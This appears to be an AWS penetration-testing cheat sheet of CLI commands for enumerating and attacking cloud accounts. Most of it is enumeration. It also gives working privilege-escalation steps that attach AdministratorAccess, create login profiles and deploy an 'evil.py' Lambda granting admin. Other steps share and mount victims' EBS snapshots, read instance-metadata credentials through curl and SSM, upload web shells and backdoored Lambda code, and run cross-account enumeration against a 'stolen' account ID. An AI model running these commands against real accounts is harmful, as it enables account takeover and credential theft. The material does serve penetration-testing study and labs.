AWS

00. Basic

Configure AWS creds

## ------------------| Configure 
aws configure
# AWS Access Key ID [None]: AKIAIOSFODNN7EXAMPLE
# AWS Secret Access Key [None]: wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
# Default region name [None]: us-west-2
# Default output format [None]:

## ------------------| Export as env
export AWS_PROFILE=ProfileName
export AWS_REGION=<AWS_REGION>
export AWS_ACCESS_KEY_ID=<ACCESS_KEY>
export AWS_SECRET_ACCESS_KEY=<SECRET_KEY>
export AWS_SESSION_TOKEN=<SESSION_TOKEN>

## ------------------| Use as file
aws configure import --csv file://credentials.csv

## ------------------| Set as .aws
### ~/.aws/credentials
[<ProfileName>]
aws_access_key_id = <ACCESS_KEY>
aws_secret_access_key = <SECRET_KEY>
aws_session_token = <SESSION_TOKEN>
### ~/.aws/config
[profile <ProfileName>]
region = <AWS_REGION>

## ------------------| List details
aws sts get-caller-identity

Credentials

## ------------------| If the AccessKeyId is starting from
AKI <-- Long term credentials
ASI <-- short term credentials

Amazon Resource Names (ARNs)

## ------------------| Format
arn:partition:service:region:account-id:resource-id
arn:partition:service:region:account-id:resource-type/resource-id
arn:partition:service:region:account-id:resource-type:resource-id
                                ^ 12 digit number                               
                                
## ------------------| [partition]
aws        AWS Regions
aws-cn     China Regions
aws-us-gov AWS GovCloud (US) Regions

## ------------------| [service]
s2,lambda,ec2,iam

## ------------------| [region]
us-east-1,.. 
## if it is none it's mean it's globle
arn:partition:service::account-id:resource-id

Attack path I

## ------------------| List down all RDS databases
aws rds describe-db-instances --output=table --color on --filter --query DBInstances[].[DBinstanceIdentifier,MasterUsername,DBSubnetGroup.VpcID,Endpoint.Address]         

## ------------------| List down all subnets
aws rds describe-db-instances --output=table --color on --filter --query DBInstances[].DBSubnetGroup.Subnets[].SubnetIdentifier

## ------------------| Examine selected database subnets 
aws rds describe-db-instances --output=table --color on --filter "Name=db-instance-id,Values=<DBName>" --query DBInstances[].DBSubnetGroup.Subnets[].SubnetIdentifier

## ------------------| List down all NACLs
aws ec2 describe-network-acls --output=table --color on --filter --query NetworkAcls[].Entries
## |0.0.0.0/0| True | -1 | allow | 100 | << Open for all

## ------------------| For selected subnets; What traffic do network access control lists (NACLs) allow?
aws ec2 describe-network-acls --output=table --color on --filter "Name=association.subnet-id,Values=subnet-0a7f04b97a6ed9b11" --query NetworkAcls[].Entries

## ------------------| What traffic do DB security groups allow?
aws ec2 describe-security-groups --output=table --color onaw
aws ec2 describe-security-groups --output=table --color on --filter "Name=groupid,Values=sg-0a7f04b97a6ed9b11" | less

## ------------------| Find VPC with access to database
aws ec2 describe-vpcs --output=table --color on
aws ec2 describe-vpcs --output=table --color on --filter "Name=cidrBlock,Values=172.31.0.0/16"
aws ec2 describe-vpcs --output=table --color on --filter "Name=cidrBlock,Values=172.31.0.0/16" --query Vpcs[].VpcId

## ------------------| VPC security group [port 3306 egress]
aws ec2 describe-security-groups  --output=table --color on --filter "Name=ip-permission.to-port,Values=3306"
aws ec2 describe-security-groups  --output=table --color on --filter "Name=egress.ip-permission.cidr,Values='0.0.0.0/0'" --filter "Name=ip-permission.to-port,Values=22" --query 'SecurityGroups[].GroupId'

## ------------------| Check Lambda functions
aws lambda list-functions --output=table --color on 
aws lambda list-functions --output=table --color on --query Functions[?VpcConfig.SecurityGroupIds==[`sg-07d51f986796059f9`]].FunctionName

## ------------------| Query to download Lambda source code
aws lambda get-function --function-name <FunctionName> --query Code.Location

## ------------------| List all ec2s which has public IP (Look for instance that can exfi) l 
aws ec2 describe-instances --output text --query Reservations[].Instances[].NetworkInterfaces[].Association.[PublicIp,PublicDnsName]

## ------------------| Find No outbound restrictions security groups
aws ec2 describe-security-groups --color on --output table --filter "Name=egress.ip-permission.cidr,Values='0.0.0.0/0'" --query SecurityGroups[].GroupId
aws ec2 describe-security-groups --color on --output table --filter "Name=egress.ip-permission.cidr,Values='0.0.0.0/0'" --filter "Name=vpc-id,Values=<VPCId>" --query SecurityGroups[].GroupId

01. IAM (Identity and Access Management)

01.0 Users

## ------------------| List all users
aws iam list-users 
aws iam list-users --output table --query Users[].[UserName,Arn,UserId]

## ------------------| Enumarate groups for users
aws iam list-groups-for-user --user-name <UserName>
for i in $(aws iam list-users --query Users[].UserName --output text);do aws iam list-groups-for-user --user-name $i;done

## ------------------| List all inline policies
aws iam list-user-policies --user-name <GroupName>

## ------------------| Lists all managed policies
aws iam list-attached-user-policies --user-name <GroupName>

## ------------------| Enumarate user's signing certificates
aws iam list-signing-certificates --user-name <UserName>
for i in $(aws iam list-users --query Users[].UserName --output text);do echo "[$i]";aws iam list-signing-certificates --user-name $i --output json;done   

## ------------------| Check for public ssh keys for user.
aws iam get-ssh-public-key --user-name <UserName> --encoding <PEM/SSH> --ssh-public-key-id <SSHPublicKeyId>

## ------------------| Check for Multi Factor Auth for user
aws iam list-virtual-mfa-devices
aws iam list-mfa-devices --user-name <UserName>
for i in $(aws iam list-users --query Users[].UserName --output text);do echo "[$i]";aws iam list-mfa-devices --user-name $i --output json;done   

## ------------------| Check if the user have console login profile
aws iam get-login-profile --user-name <UserName>
for i in $(aws iam list-users --query Users[].UserName --output text);do echo "[$i]";aws iam get-login-profile --user-name $i;done

## ------------------| Create another access key
aws iam create-access-key --user-name <UserName>

01.2 Groups

## ------------------| List all groups
aws iam list-groups --output json

## ------------------| List all inline policies
aws iam list-group-policies --group-name <GroupName>

## ------------------| Lists all managed policies
aws iam list-attached-group-policies --group-name <GroupName>

01.3 Roles

## ------------------| List all roles
aws iam list-roles --output json

## ------------------| List role information
aws iam get-role --role-name <RoleName> --output json 

## ------------------| Lists all attached policies
## arn:aws:sts::<account-id>:.../<RoleName>/...
aws iam list-attached-role-policies --role-name <RoleName>

## ------------------| List all inline policies.
aws iam list-role-policies --role-name <RoleName>

## ------------------| Assuming the role
aws sts assume-role --role-arn arn:aws:iam::<AccountID>role/<RoleName> --role-session-name AnyName

01.4 Policies

## ------------------| List all policies
aws iam list-policies --output json
aws iam list-policies --output json --scope Local
aws iam list-policies --output json | grep Admin
aws iam list-policies --output json --query Policies[].[PolicyName,PolicyId,Arn,DefaultVersionId]

## ------------------| List all inline policies
aws iam list-user-policies --user-name <UserName>
for i in $(aws iam list-users --query Users[].UserName --output text);do aws iam list-user-policies --user-name $i;done

## ------------------| List all manage policies
aws iam list-attached-user-policies --user-name <Username>
for i in $(aws iam list-users --query Users[].UserName --output text);do echo -n "[$i]\t";aws iam list-attached-user-policies --user-name user22 --output text | awk '{print $2"\t"$3}';done

## ------------------| Check policy permissions / Find the DefaultVersionId
aws iam get-policy --policy-arn <arn:aws:iam::<AccountID>:policy/<PolicyName>

## ------------------| Read the policy document
aws iam get-policy-version --output json --policy-arn <arn:aws:iam::<AccountID>:policy/<PolicyName> --version-id <DefaultVersionId>

## ------------------| List details about inline policy document
aws iam get-user-policy --user-name <UserName> --policy-name <PolicyName>
aws iam get-group-policy --group-name <GroupName> --policy-name <PolicyName>
aws iam get-role-policy --role-name <RoleName> --policy-name <PolicyName>

## ------------------| [If user has PutUserPolicy] Add an inline policy document that is embedded in the specified IAM user
aws iam put-user-policy --user-name <UserName> --policy-name <PolicyName> --policy-document file://Policy.json

## ------------------| Policy.json
{
    "Version": "2022-07-14",
    "Statement": [
        {
            "Effect": "Allow",
            "Action": [
                "*"
            ],
            "Resource": [
                "*"
            ]
        }
    ]
}

01.5 Privilege Escalation

Required Permission

PrivilageEsc Methods

iam:AttachUserPolicy

Attaching a policy to a user

iam:AttachGroupPolicy

Attaching a policy to a group

iam:AttachRolePolicy

Attaching a policy to a role

iam:CreateAccessKey

Creating a new user access key

iam:CreateLoginProfile

Creating a new login profile

iam:UpdateLoginProfile

Updating an existing login profile

iam:PassRole

ec2:RunInstances

Creating an EC2 instance with an existing instance profile

iam:PutUserPolicy

Creating/updating an inline policy for a user

iam:PutGroupPolicy

Creating/updating an inline policy for a group

iam:PutRolePolicy

Creating/updating an inline policy for a role

iam:AddUserToGroup

Adding a user to a group

iam:UpdateAssumeRolePolicy sts:AssumeRole

Updating the AssumeRolePolicyDocument of a role

iam:PassRole

lambda:CreateFunction lambda:InvokeFunction

Passing a role to a new Lambda function, then invoking it

lambda:UpdateFunctionCode

Updating the code of an existing Lambda function

01.5.1 Overly Permissive Permission

iam:AttachUserPolicy

## ------------------| Check if you have "Action": "iam:AttachUserPolicy"
aws iam get-policy-version --policy-arn <arn:aws:iam::<AccountID>:policy/<PolicyName> --version-id <DefaultVersionId>

## ------------------| Find ARN for AdministratorAccess policy
aws iam list-policies | grep "AdministratorAccess"

## ------------------| Attach policy for a user
aws iam attach-user-policy --user-name <UserName> --policy-arn arn:aws:iam::aws:policy/AdministratorAccess

## ------------------| Checking attached policies again
aws iam list-attached-user-policies --user-name <UserName>

iam:CreateLoginProfile

## ------------------| Check if you have "Action": "iam:CreateLoginProfile"
aws iam get-user-policy --user-name <UserName> --policy-name <PolicyName>

## ------------------| List all users
aws iam list-users --output table --query Users[].[UserName,Arn,UserId]

## ------------------| View existing policies
aws iam list-attached-user-policies --user-name <UserName>

## ------------------| Creating login profile
aws iam create-login-profile --user-name <UserName> --password Passw0rd@123 --no-password-reset-required

sts:AssumeRole

## ------------------| Check if you have sts:AssumeRole
aws sts assume-role --role-arn <RoleArn> --role-session-name <SessionName> --profile <ProfileName>           
### extrack the token to .aws

## ------------------| List all ebs snapshots
aws ec2 describe-snapshots --owner-ids <Victim_Account> --region <Region> --profile <ProfileName> 

## ------------------| Exploit
aws ec2 modify-snapshot-attribute --snapshot-id <SnapId> --attribute CreateVoulmePermission --operation-type add --user-ids <Victim_Account> --region <Region> --profile <ProfileName>  
aws ec2 create-volume --snapshot-id <SnapId> --availability-zone <Region> --region <Region> --profile <ProfileName>  
aws ec2 attach-voumne --device /dev/xvhd --instance-id <InstanceID> --volume-id <VolumeId> --region <Region> --profile <ProfileName>

iam:PassRole with lambda:CreateFunction

## ------------------| Check if we have rights to go ahead
aws iam list-user-policies --user-name <CurrentUserName>
aws iam get-user-policy --user-name <CurrentUserName> --policy-name <PolicyName>

## ------------------| Finding lambda role details
aws iam list-roles --output json
aws iam list-roles --output json --query "Roles[].[RoleName,AssumeRolePolicyDocument.Statement[].Principal.Service]" | grep -B2 "lambda.amazonaws.com"

## ------------------| Check policy details for lamda role for iam:AttachUserPolicy
aws iam get-role --role-name <RoleName> --output json
aws iam list-role-policies --role-name <RoleName> --output json
aws iam get-role-policy --role-name <RoleName> --policy-name <PolicyName> --output json

## ------------------| Creating lambda function (evil.py)
import boto3

def h4rithd(event, context):
    iam = boto3.client("iam")
    response = iam.attach_user_policy(
        UserName="<UserName>",PolicyArn="arn:aws:iam::aws:policy/AdministratorAccess"
    )
    return response
    
## ------------------| Upload lambda function
zip evil-function.zip evil.py
aws lambda create-function --function-name evil-function --runtime python3.8 --zip-file fileb://evil-function.zip --handler evil.h4rithd --role <arn:aws:iam::account-id:/role/lamdaFunction

## ------------------| Execute/Invoking the lambda function
aws lambda invoke --function-name evil-function results.txt

iam:PassRole with ec2:RunInstances

## ------------------| List policies and check if we have access
aws iam list-attached-user-policies --user-name <UserName>
aws iam list-user-policies --user-name <UserName>
aws iam get-user-policy --user-name <UserName> --policy-name <PolicyName>

## ------------------| List ec2 roles and get role name
aws iam list-roles --output json --query "Roles[].[RoleName,AssumeRolePolicyDocument.Statement[].Principal.Service]" | grep -B2 "ec2.amazonaws.com"

## ------------------| Listing policy details attached to role
aws iam list-role-policies --role-name <RoleName>
aws iam get-role-policy --role-name <RoleName> --policy-name <PolicyName>

## ------------------| Find AMI id
aws ec2 describe-images --owners amazon --filters 'Name=name,Values=amzn-ami-hvm-*' 'Name=state,Values=available' --output json | jq -r '.Images | sort_by(.CreationDate) | last(.[]).ImageId'

## ------------------| Find subnet id
aws ec2 describe-subnets

## ------------------| List security groups
aws ec2 describe-security-groups

## ------------------| List instance profile name
aws iam list-instance-profiles

## ------------------| Stat ec2 instance
aws ec2 run-instance --subnet-id <SubnetID> --image-id <AIMID> --iam-instance-profile Name=<ProfileName> --instance-type t2.micro --security-group-ids "<SecurityGroupId>"

## ------------------| If you have SSM *
aws ssm send-command --document-name "AWS-RunShellScript" --parameters 'commands=["curl -sS http://169.254.169.254/latest/meta-data/iam/security-credentials"]' --targets "Key=instanceids,Values=<InstaneID>" --comment "This is comment"
## Copy the CommandID

## ------------------| Check the command's output
aws ssm get-command-invocation --command-id "<CommandID>" --instance-id "<InstanceID>"

01.5.2 Dangerous policy combinations

## ------------------| List policies
aws iam list-attached-user-policies --user-name <UserName>
aws iam list-user-policies --user-name <UserName>
aws iam get-user-policy --user-name <UserName> --policy-name <PolicyName>

02. S3 (Simple Storage Service)

## ------------------| List all s3 bucktes
aws s3api list-buckets
aws s3 ls s3://

## ------------------| Interact with s3 bucktes
aws s3 ls s3://<bucktes-name>

## ------------------| Get the information about specified bucket acls
aws s3api get-bucket-acl --bucket <BucketName>

## ------------------| Get the information about specified bucket policy 
aws s3api get-bucket-policy --bucket <BucketName>

## ------------------| Retrieves the Public Access Block configuration for an Amazon S3 bucket
aws s3api get-public-access-block --bucket <BucketName>

## ------------------| List of all the objects in specified bucket 
aws s3api list-objects --bucket <BucketName>

## ------------------| Get the acls information about specified object 
aws s3api get-object-acl --bucket <BucketName> --key <ObjectName>

## ------------------| Copy file to bucket
aws s3 cp /tmp/shell.php s3://<bucktes-name>/shell.php

## ------------------| List all directory
aws --endpoint-url http://s3.bucket.htb s3 ls

## ------------------| List what inside the directory
aws --endpoint-url http://s3.bucket.htb s3 ls 
aws --endpoint-url http://s3.bucket.htb s3 ls <directory>

## ------------------| Upload file/shell
aws --endpoint-url http://s3.bucket.htb s3 cp shell.php s3://<directory>/shell.php

## ------------------| Create a bucket and enable versioning
aws s3 mb s3://aws-<BucketName> --region <Region> --profile <Profile>
aws s3api put-bucket-versioning --bucket <BucketName> --versioning-configuration Status=Enabled --region <Region> --profile <Profile>

03. VPC (Virtual Private Cloud)

## ------------------| Get details
aws ec2 describe-vpcs
aws ec2 describe-vpcs --region <us-east-1/us-west-1>
aws ec2 describe-vpcs --filters "Name=vpc-id,Values=<VpcID>"

## ------------------| List Subnets
aws ec2 describe-subnets
aws ec2 describe-subnets --filters "Name=vpc-id, Values=<VpcID>"

## ------------------| List Route Table
aws ec2 describe-route-tables
aws ec2 describe-route-tables --filters "Name=vpc-id, Values=<VpcID>"

## ------------------| List Network ACLs
aws ec2 describe-network-acls
aws ec2 describe-network-acls --filters "Name=vpc-id, Values=<VpcID>"

## ------------------| List all VPC Peering Connections
aws ec2 describe-vpc-peering-connections

## ------------------| List about EC2 Instances In the specified VPC
aws ec2 describe-instances --filters “Name=vpc-id, Values=<VpcID>”

## ------------------| List about EC2 Instances In the specified Subnet
aws ec2 describe-instances --filters “Name=subnet-id, Values=<SubnetID>"

04. EC2 (Elastic Compute Cloud)

## ------------------| List all Instances 
aws ec2 describe-instances
aws ec2 describe-instances --region <us-east-1/us-west-1>

## ------------------| List  the Information about Specified Instance 
aws ec2 describe-instances --instance-ids <InstanceId>

## ------------------| List the Information about UserData Attribute of the specified Instance
aws ec2 describe-instance-attribute –attribute userData --instance-id <InstanceId>

## ------------------| List the Information about IAM instance profile associations 
aws ec2 describe-iam-instance-profile-associations

## ------------------| Attach an instance profile with a role to a EC2 instance
aws ec2 associate-iam-instance-profile --instance-id <InstanceID> --iam-instance-profile Name=<ProfileName>       

## ------------------| AWS Metadata
### IMDV1
curl http://169.254.169.254/latest/meta-data/
curl -sS http://169.254.169.254/latest/meta-data/iam/security-credentials
curl -sS http://169.254.169.254/latest/meta-data/iam/security-credentials/Role
curl -sS http://169.254.169.254/latest/meta-data/iam/security-credentials/RoleName\
curl http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance
### IMDV2
export TOKEN=$(curl -sS -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
curl -sS -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/

## ------------------| AWS Userdata
### IMDV1
curl http://169.254.169.254/latest/user-data/
### IMDV2
export TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600") 
curl -sS -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/user-data/

05. EBS (Elastic Block Store)

## ------------------| List the Information about EBS volumes 
aws ec2 describe-volumes 

## ------------------| List about all the available EBS snapshots
aws ec2 describe-snapshots
aws ec2 describe-snapshots --owner-ids self

## ------------------| Creates a snapshot of the specified volume 
aws ec2 create-snapshot --volume-id <VolumeID> --description "Backup Snapshot" 

## ------------------| Create a volume from snapshots
aws ec2 create-volume --snapshot-id <SnapshotID> --availability-zone <AvailabilityZone>

## ------------------| Attach specified volume to the ec2-instance
aws ec2 attach-volume --volume-id <VolumeID> --instance-id <InstanceID> --device </dev/sdfd>

## ------------------| Mount Volume on EC2 file system 
sudo mount </dev/sdfd> /mnt/backups

06. EKS (Elastic Kubernetes Service)

## ------------------| Describe about all the repositories in the container registry 
aws ecr describe-repositories

## ------------------| Get the information about repository policy 
aws ecr get-repository-policy --repository-name <RepositoryName>

## ------------------| Lists of all images in the specified repository 
aws ecr list-images --repository-name <RepositoryName>

## ------------------| Describe the information about a container image 
aws ecr describe-images --repository-name <RepositoryName>--image-ids imageTag=ImageTag

## ------------------| Lists all ECS Clusters 
aws ecs list-clusters

## ------------------| Describe information about specified cluster 
aws ecs describe-clusters --cluster <ClusterName>

## ------------------| Lists all services in the specified cluster
aws ecs list-services --cluster <ClusterName>

## ------------------| Describe the information about a specified service 
aws ecs describe-services --cluster <ClusterName> --services <ServiceName>

## ------------------| Lists all tasks in the specified cluster 
aws ecs list-tasks --cluster <ClusterName>

## ------------------| Describe the information about a specified task 
aws ecs describe-tasks --cluster <ClusterName> --tasks <TaskArn>

## ------------------| Lists all containers in the specified cluster 
aws ecs list-container-instances --cluster <ClusterName>

## ------------------| Lists all EKS Clusters 
aws eks list-clusters

## ------------------| Describe the information about a specified cluster 
aws eks describe-cluster --name <ClusterName>

## ------------------| List of all node groups in a specified cluster
aws eks list-nodegroups --cluster-name <ClusterName>

## ------------------| Describe the information about a specific node group in a cluster 
aws eks describe-nodegroup --cluster-name <ClusterName> --nodegroup-name <NodeGroup>

## ------------------| List of all fargate in a specified cluster 
aws eks list-fargate-profiles --cluster-name <ClusterName>

## ------------------| Describe the information about a specific fargate profile in a cluster 
aws eks describe-fargate-profile --cluster-name <ClusterName> --fargate-profile-name <ProfileName>

07. RDS (Relational Database Service)

## ------------------| Describes the Information about the clusters in RDS
aws rds describe-db-clusters 

## ------------------| Describes the Information about the database instances in RDS
aws rds describe-db-instances 

## ------------------| Describes the Information about the subnet groups in RDS
aws rds describe-db-subnet-groups 

## ------------------| Describes the Information about the database security groups in RDS
aws rds describe-db-security-groups 

## ------------------| Describes the Information about the database proxies in RDS
aws rds describe-db-proxies

08. KMS (Key Management Server)

## ------------------| Lists of the all keys available in key management server (KMS) 
aws kms list-keys

## ------------------| Describes about specified key
aws kms describe-key --key-id <KeyID>

## ------------------| Lists of policies attached to specified key 
aws kms list-key-policies --key-id <KeyID>

## ------------------| Get full information about a policy 
aws kms get-key-policy --policy-name <PolicyName> --key-id <KeyID>

09. Lambda

Functions

## ------------------| List all functions
aws lambda list-functions --endpoint-url=http://cloud.epsilon.htb 

## ------------------| Get code 
aws lambda get-function --function-name=<Function_Name> --endpoint-url=http://cloud.epsilon.htb 

## ------------------| Upload the backdoor updated code to aws lambda function 
aws lambda update-function-code --function-name <MyFunction> --zip-file file://backdoor.zip 

## ------------------| Get details for lambda function 
aws lambda get-function --function-name <FunctionName>

## ------------------| Get details for the policy Information about the specified lambda function 
aws lambda get-policy --function-name <FunctionName>

## ------------------| Get details for the event source mapping Information about the specified lambda function 
aws lambda list-event-source-mappings --function-name <FunctionName>

## ------------------| List of all the layers (dependencies) in aws account 
aws lambda list-layers

## ------------------| Get details for the full Information about the specified layer name
aws lambda get-layer-version --layer-name <LayerName> --version-number <VersionNumber>

## ------------------| Create a lambda function and attach role to this function 
aws lambda create-function --function-name <MyFunction> --runtime <python3.7> --zip-file fileb://file.zip --handler <myfunction.handler> --role <RoleArn> --region <Region>

## ------------------| Invoke the lambda function 
aws lambda invoke --function-name <FunctionName> response.json --region <Region>

API Gateway

## ------------------| List of all the Rest APIs 
aws apigateway get-rest-apis

## ------------------| Get the information about specified API
aws apigateway get-rest-api --rest-api-id <ApiId>

## ------------------| Lists information about a collection of resources
aws apigateway get-resources --rest-api-id <ApiId>

## ------------------| Get information about the specified resource
aws apigateway get-resource --rest-api-id <ApiId> --resource-id <ResourceID>

## ------------------| Get the method information for the specified resource 
aws apigateway get-method --rest-api-id <ApiId> --resource-id <ResourceID> --http-method <Method>

## ------------------| List of all stages for a REST API 
aws apigateway get-stages --rest-api-id <ApiId>

## ------------------| Get the information about specified API's stage 
aws apigateway get-stage --rest-api-id <ApiId> --stage-name <StageName>

## ------------------| List of all the API keys 
aws apigateway get-api-keys --include-values

## ------------------| Get the information about a specified API key 
aws apigateway get-api-key --api-key <ApiKey>

10. DynamoDB

## ------------------| List Tables
aws --endpoint-url http://s3.bucket.htb dynamodb list-tables

## ------------------| Get stuff on the table 
aws --endpoint-url http://s3.bucket.htb dynamodb scan --table-name <tableName> | jq .     

## ------------------| Put stuff on the table
aws --endpoint-url http://s3.bucket.htb dynamodb put-item --table-name <tableName> --item file://<filename>.json     

## ------------------| Create table
aws  --endpoint-url http://s3.bucket.htb dynamodb create-table \                                                                                                                  255 ⨯
    --table-name alerts \
    --attribute-definitions AttributeName=title,AttributeType=S \
    --key-schema AttributeName=title,KeyType=HASH \
    --provisioned-throughput ReadCapacityUnits=5,WriteCapacityUnits=5

11. Secret Manager

## ------------------| Lists of the all secrets that are stored by Secrets Manager
aws secretsmanager list-secrets 

## ------------------| Describes about specified secret
aws secretsmanager describe-secret --secret-id <SecretName>

## ------------------| Get the resource-based policy that is attached to the specified Secret
aws secretsmanager get-resource-policy --secret-id <SecretID>

12. pacu

Cross Account Enumerations

## ------------------| User Enumerations 
### Create assume-role.json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {
        "AWS": "*"
      },
      "Action": "sts:AssumeRole",
      "Condition": {}
    }
  ]
}
### Create the role
aws iam create-role -role-name AnyName --assume-role-policy-document file:///$(pwd)/assume-role.json    
### Start pacu and set the keys
run iam__enum_users --role-name AnyName --account-id <StolenAccountID>
run iam__enum_users --role-name AnyName --account-id <StolenAccountID>  --word-list username.txt

## ------------------| Role Enumerations
run iam__enum_roles --role-name AnyName --account-id <StolenAccountID>
run iam__enum_roles --role-name AnyName --account-id <StolenAccountID>  --word-list username.txt

13. ScoutSuite

## ------------------| Install
git clone https://github.com/nccgroup/ScoutSuite && cd ScoutSuite
virtualenv -p python3 venv && source venv/bin/activate
pip install -r requirements.txt
python scout.py --help

## ------------------| Enumerate
python scout.py aws -p <Profile> -r <Region>

14. PMapper

## ------------------| Install
pip install principalmapper

## ------------------| Create a graph for the account, accessed through AWS CLI profile "skywalker"
pmapper --profile skywalker graph create

## ------------------| Run a query to see who can make IAM Users
pmapper --profile skywalker query 'who can do iam:CreateUser'

## ------------------| Run a query to see who can launch a big expensive EC2 instance, aside from "admin" users
pmapper --account 000000000000 argquery -s --action 'ec2:RunInstances' --condition 'ec2:InstanceType=c6gd.16xlarge'

## ------------------| Run the privilege escalation preset query, skip reporting current "admin" users
pmapper --account 000000000000 query -s 'preset privesc *'

## ------------------| Create an SVG representation of the admins/privescs/inter-principal access
pmapper --account 000000000000 visualize --filetype

PreviousCloud NextDocker

Last updated 2 years ago